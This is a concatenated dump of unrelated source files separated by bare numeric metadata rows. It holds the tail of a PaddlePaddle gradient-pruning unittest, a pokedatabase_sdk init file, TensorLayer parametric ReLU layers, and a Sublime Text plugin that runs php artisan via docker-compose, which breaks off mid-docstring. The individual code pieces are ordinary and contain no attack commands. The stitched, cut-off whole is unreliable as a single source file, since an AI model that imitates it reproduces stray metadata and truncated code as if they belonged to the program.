        super(MyLayer2, self).__init__(name_scope, dtype)
        self.embed0 = fluid.Embedding(size=(vocab_size, size))
        self.embed1 = fluid.Embedding(size=(vocab_size, size))
        self.fc0 = fluid.FC(self.full_name(), size=size, dtype=dtype)
        self.fc1 = fluid.FC(self.full_name(), size=size, dtype=dtype)

    def forward(self, indices):
        # Unlike MyLayer, every parameter contributes to this loss.
        branch0 = self.fc0(self.embed0(indices))
        branch1 = self.fc1(self.embed1(indices))
        return fluid.layers.reduce_mean(branch0 + branch1)

    def linear0(self, x):
        # Uses fc0 only.
        return fluid.layers.reduce_mean(self.fc0(x))

    def embed_linear0(self, x):
        # Uses embed0 and fc0 only.
        return fluid.layers.reduce_mean(self.fc0(self.embed0(x)))
class TestImperativeAutoPrune(unittest.TestCase):
    """Checks that dygraph backward() prunes gradients for branches that do
    not contribute to the loss (stop_gradient tensors, unused split halves,
    parameters untouched by the traced graph).

    Fixes over the original:
      * ``test_case2_prune_no_grad_branch`` was defined twice with identical
        bodies; the second definition shadowed the first. The duplicate is
        removed.
      * ``test_auto_prune_with_optimizer`` reused the stale ``params_grads``
        list from the first ``minimize()`` call inside the second guard; the
        second call's return value is now captured.
      * Parameter-name comparisons used ``is not`` (identity) where ``!=``
        (equality) was intended.
      * A misspelled, unused variable ``emebd`` is fixed so the converted
        variable is actually fed to the model.
    """

    def test_auto_prune(self):
        # Both inputs feed the loss -> both FC weights get gradients.
        with fluid.dygraph.guard():
            case1 = AutoPruneLayer0("l1")
            value1 = np.arange(25).reshape(5, 5).astype("float32")
            value2 = np.arange(25).reshape(5, 5).astype("float32")
            v1 = fluid.dygraph.to_variable(value1)
            v2 = fluid.dygraph.to_variable(value2)
            loss = case1(v1, v2)
            loss.backward()
            self.assertTrue(case1.fc2.weight._grad_ivar() is not None)
            self.assertTrue(case1.fc1.weight._grad_ivar() is not None)

    def test_auto_prune2(self):
        # fc2's output is stop_gradient -> fc2 gets no gradient.
        with fluid.dygraph.guard():
            case2 = AutoPruneLayer1("l1")
            value1 = np.arange(25).reshape(5, 5).astype("float32")
            value2 = np.arange(25).reshape(5, 5).astype("float32")
            v1 = fluid.dygraph.to_variable(value1)
            v2 = fluid.dygraph.to_variable(value2)
            loss = case2(v1, v2)
            loss.backward()
            self.assertTrue(case2.fc2.weight._grad_ivar() is None)
            self.assertTrue(case2.fc1.weight._grad_ivar() is not None)

    def test_auto_prune3(self):
        # Backward from the loss: the unused split half has zero grad.
        with fluid.dygraph.guard():
            case3 = AutoPruneLayer3("l3")
            value1 = np.arange(784).reshape(1, 784).astype("float32")
            value2 = np.arange(1).reshape(1, 1).astype("int64")
            v1 = fluid.dygraph.to_variable(value1)
            v2 = fluid.dygraph.to_variable(value2)
            loss, part2 = case3(v1, v2, 1)
            loss.backward()
            self.assertTrue(case3.fc.weight._grad_ivar() is not None)
            self.assertTrue((part2.gradient() == 0).all())

    def test_auto_prune4(self):
        # Backward from part2 itself: its own gradient is all ones.
        with fluid.dygraph.guard():
            case4 = AutoPruneLayer3("l3")
            value1 = np.arange(784).reshape(1, 784).astype("float32")
            value2 = np.arange(1).reshape(1, 1).astype("int64")
            v1 = fluid.dygraph.to_variable(value1)
            v2 = fluid.dygraph.to_variable(value2)
            loss, part2 = case4(v1, v2, 1)
            part2.backward()
            self.assertTrue(case4.fc.weight._grad_ivar() is not None)
            self.assertTrue((part2.gradient() == 1).all())

    def test_auto_prune5(self):
        # Backward from part1: part2 stays zero.
        with fluid.dygraph.guard():
            case4 = AutoPruneLayer3("l3")
            value1 = np.arange(784).reshape(1, 784).astype("float32")
            value2 = np.arange(1).reshape(1, 1).astype("int64")
            v1 = fluid.dygraph.to_variable(value1)
            v2 = fluid.dygraph.to_variable(value2)
            loss, part1, part2 = case4(v1, v2, 2)
            part1.backward()
            self.assertTrue(case4.fc.weight._grad_ivar() is not None)
            self.assertTrue((part2.gradient() == 0).all())

    def test_auto_prune6(self):
        # A stop_gradient input to concat contributes no gradient.
        with fluid.dygraph.guard():
            value0 = np.arange(26).reshape(2, 13).astype("float32")
            value1 = np.arange(6).reshape(2, 3).astype("float32")
            value2 = np.arange(10).reshape(2, 5).astype("float32")
            fc = fluid.FC("fc1", size=5, dtype="float32")
            fc2 = fluid.FC("fc2", size=3, dtype="float32")
            a = fluid.dygraph.to_variable(value0)
            b = fluid.dygraph.to_variable(value1)
            c = fluid.dygraph.to_variable(value2)
            out1 = fc(a)
            out2 = fc2(b)
            out1.stop_gradient = True
            out = fluid.layers.concat(input=[out1, out2, c], axis=1)
            out.backward()
            self.assertTrue((fc.weight.gradient() == 0).all())
            self.assertTrue((out1.gradient() == 0).all())

    def test_auto_prune7(self):
        # Same as test_auto_prune6, but with an explicit BackwardStrategy.
        with fluid.dygraph.guard():
            value0 = np.arange(26).reshape(2, 13).astype("float32")
            value1 = np.arange(6).reshape(2, 3).astype("float32")
            value2 = np.arange(10).reshape(2, 5).astype("float32")
            fc = fluid.FC("fc1", size=5, dtype="float32")
            fc2 = fluid.FC("fc2", size=3, dtype="float32")
            a = fluid.dygraph.to_variable(value0)
            b = fluid.dygraph.to_variable(value1)
            c = fluid.dygraph.to_variable(value2)
            out1 = fc(a)
            out2 = fc2(b)
            out1.stop_gradient = True
            out = fluid.layers.concat(input=[out1, out2, c], axis=1)
            backward_strategy = fluid.dygraph.BackwardStrategy()
            out.backward(backward_strategy)
            self.assertTrue((fc.weight.gradient() == 0).all())
            self.assertTrue((out1.gradient() == 0).all())

    def test_auto_prune8(self):
        # Freezing fc2's weight: only fc's weight is updated by minimize().
        with fluid.dygraph.guard():
            value0 = np.arange(26).reshape(2, 13).astype("float32")
            value1 = np.arange(6).reshape(2, 3).astype("float32")
            value2 = np.arange(10).reshape(2, 5).astype("float32")
            fc = fluid.FC("fc1", size=5, dtype="float32")
            fc2 = fluid.FC("fc2", size=3, dtype="float32")
            a = fluid.dygraph.to_variable(value0)
            b = fluid.dygraph.to_variable(value1)
            c = fluid.dygraph.to_variable(value2)
            out1 = fc(a)
            fc_origin = fc.weight.numpy()
            out2 = fc2(out1)
            fc2_origin = fc2.weight.numpy()
            fc2.weight.stop_gradient = True
            out2.backward()
            optimizer = fluid.optimizer.SGD(
                learning_rate=0.003,
                parameter_list=(fc.parameters() + fc2.parameters()))
            optimizer.minimize(out2)
            self.assertTrue(np.array_equal(fc2_origin, fc2.weight.numpy()))
            self.assertFalse(np.array_equal(fc_origin, fc.weight.numpy()))

    def test_auto_prune9(self):
        # Detaching the loss itself: no parameter is updated at all.
        with fluid.dygraph.guard():
            value0 = np.arange(26).reshape(2, 13).astype("float32")
            value1 = np.arange(6).reshape(2, 3).astype("float32")
            value2 = np.arange(10).reshape(2, 5).astype("float32")
            fc = fluid.FC("fc1", size=5, dtype="float32")
            fc2 = fluid.FC("fc2", size=3, dtype="float32")
            a = fluid.dygraph.to_variable(value0)
            b = fluid.dygraph.to_variable(value1)
            c = fluid.dygraph.to_variable(value2)
            out1 = fc(a)
            fc_origin = fc.weight.numpy()
            out2 = fc2(out1)
            fc2_origin = fc2.weight.numpy()
            out2.stop_gradient = True
            out2.backward()
            optimizer = fluid.optimizer.SGD(
                learning_rate=0.003,
                parameter_list=(fc.parameters() + fc2.parameters()))
            optimizer.minimize(out2)
            self.assertTrue(np.array_equal(fc2_origin, fc2.weight.numpy()))
            self.assertTrue(np.array_equal(fc_origin, fc.weight.numpy()))
            # Reading the gradient of a pruned weight may raise ValueError.
            try:
                fc2.weight.gradient()
            except ValueError as e:
                assert type(e) == ValueError

    def test_auto_prune10(self):
        # Same as test_auto_prune7, with sorted-sum gradient accumulation.
        with fluid.dygraph.guard():
            value0 = np.arange(26).reshape(2, 13).astype("float32")
            value1 = np.arange(6).reshape(2, 3).astype("float32")
            value2 = np.arange(10).reshape(2, 5).astype("float32")
            fc = fluid.FC("fc1", size=5, dtype="float32")
            fc2 = fluid.FC("fc2", size=3, dtype="float32")
            a = fluid.dygraph.to_variable(value0)
            b = fluid.dygraph.to_variable(value1)
            c = fluid.dygraph.to_variable(value2)
            out1 = fc(a)
            out2 = fc2(b)
            out1.stop_gradient = True
            out = fluid.layers.concat(input=[out1, out2, c], axis=1)
            backward_strategy = fluid.dygraph.BackwardStrategy()
            backward_strategy.sort_sum_gradient = True
            out.backward(backward_strategy)
            self.assertTrue((fc.weight.gradient() == 0).all())
            self.assertTrue((out1.gradient() == 0).all())

    def test_auto_prune_with_optimizer(self):
        # Parameters untouched by the loss must be skipped by minimize().
        vocab_size = 100
        size = 20
        batch_size = 16
        indices = np.random.randint(
            low=0, high=100, size=(batch_size, 1)).astype("int64")
        embed = np.random.randn(batch_size, size).astype("float32")

        place = fluid.CPUPlace()
        with fluid.dygraph.guard(place):
            model = MyLayer("mylayer", vocab_size, size)
            optimizer = fluid.optimizer.AdamOptimizer(
                0.001, parameter_list=model.parameters())
            grad_clip = fluid.dygraph_grad_clip.GradClipByGlobalNorm(0.001)

            indices = fluid.dygraph.to_variable(indices)
            # Fix: was assigned to a misspelled `emebd` that was never used,
            # while the raw numpy array was passed to the model.
            embed = fluid.dygraph.to_variable(embed)
            dummy_loss = model(embed)

            loss = model.embed_linear0(indices)
            loss.backward()
            _, params_grads = optimizer.minimize(loss, grad_clip=grad_clip)
            for items in params_grads:
                # Fix: compare names by value, not identity.
                assert items[0].name != model.embed1.weight.name
                assert items[0].name != model.fc1.weight.name
            assert model.embed1.weight._grad_ivar() is None
            assert model.fc1.weight._grad_ivar() is None

        with fluid.dygraph.guard(place):
            model = MyLayer2("mylayer", vocab_size, size)
            optimizer = fluid.optimizer.AdamOptimizer(
                0.001, parameter_list=model.parameters())
            grad_clip = fluid.dygraph_grad_clip.GradClipByGlobalNorm(0.001)

            indices = fluid.dygraph.to_variable(indices)
            dummy_loss = model(indices)

            loss = model.embed_linear0(indices)
            loss.backward()
            # Fix: capture this call's (optimize_ops, params_grads) instead
            # of reusing the stale list from the previous guard block.
            _, params_grads = optimizer.minimize(loss, grad_clip=grad_clip)
            for items in params_grads:
                assert items[0].name != model.embed1.weight.name
                assert items[0].name != model.fc1.weight.name
            assert model.embed1.weight._grad_ivar() is None
            assert model.fc1.weight._grad_ivar() is None

    def test_case2_prune_no_grad_branch(self):
        # NOTE: this method was duplicated verbatim in the original file;
        # the shadowing duplicate has been removed.
        with fluid.dygraph.guard():
            value1 = np.arange(784).reshape(1, 784)
            value2 = np.arange(1).reshape(1, 1)
            v1 = fluid.dygraph.to_variable(value1).astype("float32")
            v2 = fluid.dygraph.to_variable(value2).astype("float32")
            case3 = AutoPruneLayer2("l2")
            loss = case3(v1, v2)
            loss.backward()
            self.assertTrue(case3.fc2.weight._grad_ivar() is None)
            self.assertTrue(case3.fc.weight._grad_ivar() is not None)

    def test_case3_prune_no_grad_branch2(self):
        # one_hot has no gradient op -> the upstream FC gets no gradient.
        with fluid.dygraph.guard():
            value1 = np.arange(1).reshape(1, 1)
            fc = fluid.dygraph.FC("FC1", size=1, act=None)
            label = fluid.dygraph.to_variable(value1).astype("float32")
            label = fc(label)
            label = fluid.layers.cast(label, dtype="float32")
            label = fluid.layers.cast(label, dtype='int64')
            out = fluid.layers.one_hot(input=label, depth=100)
            loss = fluid.layers.mean(out)
            loss.backward()
            self.assertTrue(fc.weight._grad_ivar() is None)

    def test_case4_with_no_grad_op_maker(self):
        # gaussian_random has no grad op maker -> no gradient on its output.
        with fluid.dygraph.guard():
            out = fluid.layers.gaussian_random(shape=[20, 30])
            loss = fluid.layers.mean(out)
            loss.backward()
            self.assertTrue(out._grad_ivar() is None)
# Run the test suite when this file is executed as a script.
if __name__ == '__main__':
    unittest.main()
| 41.443902
| 79
| 0.595633
| 2,121
| 16,992
| 4.641207
| 0.121169
| 0.075579
| 0.048354
| 0.075985
| 0.80638
| 0.790532
| 0.768285
| 0.741061
| 0.705303
| 0.691284
| 0
| 0.049963
| 0.277954
| 16,992
| 409
| 80
| 41.545232
| 0.752384
| 0.047728
| 0
| 0.716374
| 0
| 0
| 0.025863
| 0
| 0
| 0
| 0
| 0
| 0.102339
| 1
| 0.090643
| false
| 0
| 0.008772
| 0
| 0.152047
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6ab86e039402a3c55af9b1900b089d188f8274c8
| 173
|
py
|
Python
|
pokedatabase_sdk/__init__.py
|
AlonsoMartinToledano/pokedatabase_sdk
|
128780817d0a1473859d5858e6708f945b26352a
|
[
"MIT"
] | null | null | null |
pokedatabase_sdk/__init__.py
|
AlonsoMartinToledano/pokedatabase_sdk
|
128780817d0a1473859d5858e6708f945b26352a
|
[
"MIT"
] | null | null | null |
pokedatabase_sdk/__init__.py
|
AlonsoMartinToledano/pokedatabase_sdk
|
128780817d0a1473859d5858e6708f945b26352a
|
[
"MIT"
] | null | null | null |
from pokedatabase_sdk.pokedatabase_sdk import pokemonNames
from pokedatabase_sdk.pokedatabase_sdk import gameNames
from pokedatabase_sdk.pokedatabase_sdk import requestsList
| 57.666667
| 58
| 0.919075
| 21
| 173
| 7.285714
| 0.333333
| 0.588235
| 0.372549
| 0.607843
| 0.784314
| 0.784314
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063584
| 173
| 3
| 59
| 57.666667
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
6ac0fd75683317e29b7432666fe32ecdae80ec71
| 10,627
|
py
|
Python
|
tensorlayer/layers/activation.py
|
KuKuXia/tensorlayer
|
654de4a37892cde54495350f99f5f3b38b2c6eb3
|
[
"Apache-2.0"
] | null | null | null |
tensorlayer/layers/activation.py
|
KuKuXia/tensorlayer
|
654de4a37892cde54495350f99f5f3b38b2c6eb3
|
[
"Apache-2.0"
] | null | null | null |
tensorlayer/layers/activation.py
|
KuKuXia/tensorlayer
|
654de4a37892cde54495350f99f5f3b38b2c6eb3
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/python
# -*- coding: utf-8 -*-
import tensorflow as tf
from tensorlayer import logging
from tensorlayer.activation import leaky_relu6, leaky_twice_relu6
from tensorlayer.decorators import deprecated_alias
from tensorlayer.initializers import truncated_normal
from tensorlayer.layers.core import Layer
# from tensorlayer.layers.core import LayersConfig
# Public API of this module: the three parametric ReLU layer classes.
__all__ = [
    'PRelu',
    'PRelu6',
    'PTRelu6',
]
class PRelu(Layer):
    """
    The :class:`PRelu` class is Parametric Rectified Linear layer.

    It follows f(x) = alpha * x for x < 0, f(x) = x for x >= 0,
    where alpha is a learned array with the same shape as x.

    Parameters
    ----------
    channel_shared : boolean
        If True, single weight is shared by all channels.
    in_channels: int
        The number of channels of the previous layer.
        If None, it will be automatically detected when the layer is forwarded for the first time.
    a_init : initializer
        The initializer for initializing the alpha(s).
    name : None or str
        A unique layer name.

    Examples
    -----------
    >>> inputs = tl.layers.Input([10, 5])
    >>> prelulayer = tl.layers.PRelu(channel_shared=True)
    >>> print(prelulayer)
    PRelu(channel_shared=True,in_channels=None,name=prelu)
    >>> prelu = prelulayer(inputs)
    >>> model = tl.models.Model(inputs=inputs, outputs=prelu)
    >>> out = model(data, is_train=True)

    References
    -----------
    - `Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification <http://arxiv.org/abs/1502.01852>`__
    - `Convolutional Deep Belief Networks on CIFAR-10 [A. Krizhevsky, 2010] <http://www.cs.utoronto.ca/~kriz/conv-cifar10-aug2010.pdf>`__
    """

    def __init__(
            self,
            channel_shared=False,
            in_channels=None,
            a_init=truncated_normal(mean=0.0, stddev=0.1),
            name=None  # "prelu"
    ):
        super(PRelu, self).__init__(name)
        self.channel_shared = channel_shared
        self.in_channels = in_channels
        self.a_init = a_init

        # Build eagerly when the weight shape is already known; otherwise
        # defer to the first forward pass.
        if self.channel_shared:
            self.build((None, ))
            self._built = True
        elif self.in_channels is not None:
            self.build((None, self.in_channels))
            self._built = True

        logging.info("PRelu %s: channel_shared: %s" % (self.name, self.channel_shared))

    def __repr__(self):
        """Return a short description of the layer's configuration."""
        s = ('{classname}(')
        s += 'channel_shared={channel_shared},'
        s += 'in_channels={in_channels},'
        s += 'name={name}'
        s += ')'
        return s.format(classname=self.__class__.__name__, **self.__dict__)

    def build(self, inputs_shape):
        """Create the alpha weight: one scalar when channel_shared, else
        one value per channel (last dimension of the input)."""
        if self.channel_shared:
            w_shape = (1, )
        else:
            w_shape = (inputs_shape[-1], )
        self.alpha_var = self._get_weights("alpha", shape=w_shape, init=self.a_init)
        # Constrain alpha into (0, 1) via a sigmoid.
        self.alpha_var_constrained = tf.nn.sigmoid(self.alpha_var, name="constraining_alpha_var_in_0_1")

    def forward(self, inputs):
        """Apply f(x) = x for x >= 0, alpha * x for x < 0.

        Fix: the original recomputed ``alpha_var_constrained`` on every
        forward call, which is redundant — ``build`` already derives it from
        ``alpha_var`` (and the sibling PRelu6/PTRelu6 layers do not
        recompute it either).
        """
        pos = tf.nn.relu(inputs)
        neg = -self.alpha_var_constrained * tf.nn.relu(-inputs)
        return pos + neg
class PRelu6(Layer):
    """Parametric Rectified Linear layer integrating ReLU6 behaviour.

    A modified version of :class:`PRelu` that combines the leaky behaviour of
    :func:`tl.act.leaky_relu` with the upper cap of :func:`tf.nn.relu6`:

    - When x < 0: ``f(x) = alpha_low * x``.
    - When x in [0, 6]: ``f(x) = x``.
    - When x > 6: ``f(x) = 6``.

    Parameters
    ----------
    channel_shared : boolean
        If True, single weight is shared by all channels.
    in_channels: int
        The number of channels of the previous layer.
        If None, it will be automatically detected when the layer is forwarded for the first time.
    a_init : initializer
        The initializer for initializing the alpha(s).
    name : None or str
        A unique layer name.

    References
    -----------
    - `Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification <http://arxiv.org/abs/1502.01852>`__
    - `Rectifier Nonlinearities Improve Neural Network Acoustic Models [A. L. Maas et al., 2013] <https://ai.stanford.edu/~amaas/papers/relu_hybrid_icml2013_final.pdf>`__
    - `Convolutional Deep Belief Networks on CIFAR-10 [A. Krizhevsky, 2010] <http://www.cs.utoronto.ca/~kriz/conv-cifar10-aug2010.pdf>`__
    """

    def __init__(self, channel_shared=False, in_channels=None,
                 a_init=truncated_normal(mean=0.0, stddev=0.1),
                 name=None):  # default scope name: "prelu6"
        super(PRelu6, self).__init__(name)
        self.channel_shared = channel_shared
        self.in_channels = in_channels
        self.a_init = a_init

        # Build immediately when the weight shape is determined up front.
        if channel_shared:
            self.build((None, ))
            self._built = True
        elif in_channels is not None:
            self.build((None, in_channels))
            self._built = True

        logging.info("PRelu6 %s: channel_shared: %s" % (self.name, self.channel_shared))

    def __repr__(self):
        template = ('{classname}('
                    'channel_shared={channel_shared},'
                    'in_channels={in_channels},'
                    'name={name})')
        return template.format(classname=self.__class__.__name__, **self.__dict__)

    def build(self, inputs_shape):
        # Scalar alpha when shared, otherwise one alpha per channel.
        if self.channel_shared:
            w_shape = (1, )
        else:
            w_shape = (inputs_shape[-1], )
        self.alpha_var = self._get_weights("alpha", shape=w_shape, init=self.a_init)
        # Sigmoid keeps alpha inside (0, 1).
        self.alpha_var_constrained = tf.nn.sigmoid(self.alpha_var, name="constraining_alpha_var_in_0_1")

    def forward(self, inputs):
        positive = tf.nn.relu(inputs)
        capped = -tf.nn.relu(inputs - 6)  # cancels everything above 6
        negative = -self.alpha_var_constrained * tf.nn.relu(-inputs)
        return positive + capped + negative
class PTRelu6(Layer):
    """Parametric Rectified Linear layer integrating ReLU6 behaviour, with
    leaky behaviour on BOTH sides.

    This version goes one step beyond :class:`PRelu6` by introducing leaky
    behaviour on the positive side when x > 6:

    - When x < 0: ``f(x) = alpha_low * x``.
    - When x in [0, 6]: ``f(x) = x``.
    - When x > 6: ``f(x) = 6 + (alpha_high * (x-6))``.

    Parameters
    ----------
    channel_shared : boolean
        If True, single weight is shared by all channels.
    in_channels: int
        The number of channels of the previous layer.
        If None, it will be automatically detected when the layer is forwarded for the first time.
    a_init : initializer
        The initializer for initializing the alpha(s).
    name : None or str
        A unique layer name.

    References
    -----------
    - `Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification <http://arxiv.org/abs/1502.01852>`__
    - `Convolutional Deep Belief Networks on CIFAR-10 [A. Krizhevsky, 2010] <http://www.cs.utoronto.ca/~kriz/conv-cifar10-aug2010.pdf>`__
    - `Rectifier Nonlinearities Improve Neural Network Acoustic Models [A. L. Maas et al., 2013] <https://ai.stanford.edu/~amaas/papers/relu_hybrid_icml2013_final.pdf>`__
    """

    def __init__(
            self,
            channel_shared=False,
            in_channels=None,
            a_init=truncated_normal(mean=0.0, stddev=0.1),
            name=None  # "ptrelu6"
    ):
        super(PTRelu6, self).__init__(name)
        self.channel_shared = channel_shared
        self.in_channels = in_channels
        self.a_init = a_init

        if self.channel_shared:
            self.build((None, ))
            self._built = True
        # Fix: the original tested `elif self.in_channels:` (truthiness),
        # inconsistent with PRelu/PRelu6 which test `is not None`.
        elif self.in_channels is not None:
            self.build((None, self.in_channels))
            self._built = True

        logging.info("PTRelu6 %s: channel_shared: %s" % (self.name, self.channel_shared))

    def __repr__(self):
        """Return a short description of the layer's configuration."""
        s = ('{classname}(')
        s += 'channel_shared={channel_shared},'
        s += 'in_channels={in_channels},'
        s += 'name={name}'
        s += ')'
        return s.format(classname=self.__class__.__name__, **self.__dict__)

    def build(self, inputs_shape):
        """Create the two alpha weights (low/high side), scalar when
        channel_shared, else one value per channel."""
        if self.channel_shared:
            w_shape = (1, )
        else:
            w_shape = (inputs_shape[-1], )

        # Alpha for outputs lower than zero, constrained into (0, 1).
        self.alpha_low = self._get_weights("alpha_low", shape=w_shape, init=self.a_init)
        self.alpha_low_constrained = tf.nn.sigmoid(self.alpha_low, name="constraining_alpha_low_in_0_1")

        # Alpha for outputs higher than 6, constrained into (0, 1).
        self.alpha_high = self._get_weights("alpha_high", shape=w_shape, init=self.a_init)
        self.alpha_high_constrained = tf.nn.sigmoid(self.alpha_high, name="constraining_alpha_high_in_0_1")

    def forward(self, inputs):
        """Apply the doubly-leaky capped activation described above."""
        pos = tf.nn.relu(inputs)
        # Cap at 6, then re-add the leaky slope above 6.
        pos_6 = -tf.nn.relu(inputs - 6) + self.alpha_high_constrained * tf.nn.relu(inputs - 6)
        neg = -self.alpha_low_constrained * tf.nn.relu(-inputs)
        return pos + pos_6 + neg
| 37.818505
| 170
| 0.645996
| 1,421
| 10,627
| 4.629134
| 0.153413
| 0.063241
| 0.038766
| 0.019155
| 0.849042
| 0.839617
| 0.819398
| 0.819398
| 0.815293
| 0.80526
| 0
| 0.02373
| 0.238637
| 10,627
| 280
| 171
| 37.953571
| 0.789272
| 0.479251
| 0
| 0.771654
| 0
| 0
| 0.101958
| 0.062028
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094488
| false
| 0
| 0.047244
| 0
| 0.212598
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a8f1e1e5b6305898bfc3e725cebdd0b723ce1da
| 14,752
|
py
|
Python
|
dlaravel.py
|
DevinY/dlaravel-alias
|
ddace8f57ca483a019355ea105bf6e0a17f64c55
|
[
"MIT"
] | 1
|
2018-09-04T09:04:43.000Z
|
2018-09-04T09:04:43.000Z
|
dlaravel.py
|
DevinY/dlaravel-alias
|
ddace8f57ca483a019355ea105bf6e0a17f64c55
|
[
"MIT"
] | null | null | null |
dlaravel.py
|
DevinY/dlaravel-alias
|
ddace8f57ca483a019355ea105bf6e0a17f64c55
|
[
"MIT"
] | null | null | null |
import sublime, sublime_plugin, re
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
class PhpArtisanCommand(sublime_plugin.TextCommand):
    """Prompt for a `php artisan` subcommand and run it inside the
    D-Laravel docker-compose php service of the current project.

    Fixes over the original: bare ``except:`` clauses narrowed to the
    exceptions actually expected, the release file is closed via ``with``,
    the success status message said "composer" although the command run is
    ``php artisan``, and the "faild" typo in the error message is corrected.
    """

    def run(self, edit, **args):
        self.window = self.view.window()
        self.args = args

        # ===== Check Project Folder =====
        # Derive the D-Laravel root and the project folder from the path of
        # the current file (…/sites/<project>/…); fall back to the first
        # workspace folder when no file is open in the active view.
        try:
            file = self.window.extract_variables()['file']
            dlaravel_folder = re.sub("^(.+?)(/sites/)(.+?)/(.+?)$", "\\1", file)
            project_folder = re.sub("^(.+?)(/sites/)(.+?)/(.+?)$", "\\3", file)
            folder = "{}/sites/{}".format(dlaravel_folder, project_folder)
        except KeyError:  # no 'file' variable -> nothing open; use the folder
            folder = self.window.extract_variables()['folder']
            dlaravel_folder = re.sub("^(.+?)(/sites/)(.+?)$", "\\1", folder)

        # A readable etc/dlaravel-release marker identifies a D-Laravel tree.
        try:
            with open("{}/etc/dlaravel-release".format(dlaravel_folder), "r") as release_file:
                dlaravel_release = release_file.read()
            print("Project Folder: {}".format(folder))
            print(dlaravel_release)
        except OSError:  # marker missing or unreadable
            print("Unable to find D-Laravel folder.")
            print("You can download it at https://github.com/DevinY/dlaravel.")
            self.window.run_command("show_panel", {"panel": "console", "toggle": True})
            self.view.set_status("Dlaravel", "Unable to find D-Laravel")
            return False

        self.view.set_status("Dlaravel", "artisan command will be run in {}".format(folder))
        project_folder = re.sub("^(.+?)(/sites/)(.+?)$", "\\3", folder)
        # ===============================

        def auto_complete_level2(*args):
            # Second-level completions for partially typed subcommands.
            if ("route:l\t" in list(args) or "route:li\t" in list(args)):
                self.window.show_input_panel("{} php artisan".format(project_folder), "route:list", on_done, None, None)
            if ("migrate:refresh\t" in list(args)):
                self.window.show_input_panel("{} php artisan".format(project_folder), "migrate:refresh", on_done, None, None)

        def auto_complete(*args):
            # First-level completions triggered by a trailing TAB.
            if ("mi\t" in list(args)):
                self.window.show_input_panel("php artisan", "migrate", on_done, auto_complete_level2, None)
            if ("ro\t" in list(args)):
                self.window.show_input_panel("php artisan", "route:", on_done, auto_complete_level2, None)
            if ("vi\t" in list(args)):
                self.window.show_input_panel("php artisan", "view", on_done, auto_complete_level2, None)
            if ("view:c\t" in list(args)):
                self.window.show_input_panel("php artisan", "view:clear", on_done, auto_complete_level2, None)

        def run_command(*args):
            # Execute `php artisan <args>` inside the docker-compose service.
            dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
            dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
            parameter = ""
            for arg in list(args):
                parameter = parameter + " {}".format(arg)
            print('Command is issued (php artisan{}), Please wait...'.format(parameter))
            command = ["docker-compose", "-f", "{}/docker-compose.yml".format(dlaravel_basepath),
                       "exec", "-w", "/var/www/html/{}".format(dlaravel_project),
                       "-u", "dlaravel", "-T", "php", "php", "artisan"] + list(args)
            proc = Popen(command, bufsize=0, stdout=PIPE, stderr=PIPE, universal_newlines=True)
            output, error = proc.communicate()
            proc.wait()
            exit_code = proc.poll()
            if (exit_code == 0):
                # Fix: message previously claimed "composer" ran.
                self.view.set_status("Dlaravel", "artisan{} is done.".format(parameter))
                print(output)
                print("Finished.")
            else:
                # Fix: "faild" typo.
                print("failed: {}".format(error))

        def on_done(command):
            # Run the typed command on a worker thread so the UI stays live.
            self.window.run_command("show_panel", {"panel": "console", "toggle": True})
            this_thread = Thread(target=run_command, args=command.split())
            this_thread.start()

        self.window.show_input_panel("({}) php artisan".format(project_folder), "", on_done, auto_complete, None)
class PhpArtisanMigrateCommand(sublime_plugin.TextCommand):
    """Run `php artisan migrate` for the current project on a background
    thread inside the D-Laravel docker-compose php service.

    Fix over the original: the progress and status messages said "composer"
    although the command actually run is ``php artisan``.
    """

    def run(self, edit):
        args = "migrate"
        self.window = self.view.window()

        def run_command(*args):
            args = list(args)
            folder = self.window.extract_variables()['folder']
            dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
            dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
            # Fix: message previously said "composer".
            print('Command is issued (php artisan ' + ' '.join(args) + '), Please wait...')
            command = ["docker-compose", "-f", "{}/docker-compose.yml".format(dlaravel_basepath),
                       "exec", "-w", "/var/www/html/{}".format(dlaravel_project),
                       "-u", "dlaravel", "-T", "php", "php", "artisan", "migrate"]
            proc = Popen(command, bufsize=0, stdout=PIPE, stderr=PIPE, universal_newlines=True)
            output, error = proc.communicate()
            proc.wait()
            exit_code = proc.poll()
            if (exit_code == 0):
                # Fix: status previously said "composer".
                self.view.set_status("Dlaravel", "artisan {} is done.".format(' '.join(args)))
                print(output)
                print("Finished.")
            else:
                print("{}".format(error))

        self.window.run_command("show_panel", {"panel": "console", "toggle": True})
        this_thread = Thread(target=run_command, args=args.split())
        this_thread.start()
class ConsolePsCommand(sublime_plugin.TextCommand):
    """Show `docker-compose ps` output for the current project in the
    Sublime console, on a background thread.

    Fix over the original: both ``set_status`` calls used
    ``"literal" % command`` — a %-format with no placeholder — which raises
    ``TypeError: not all arguments converted during string formatting`` as
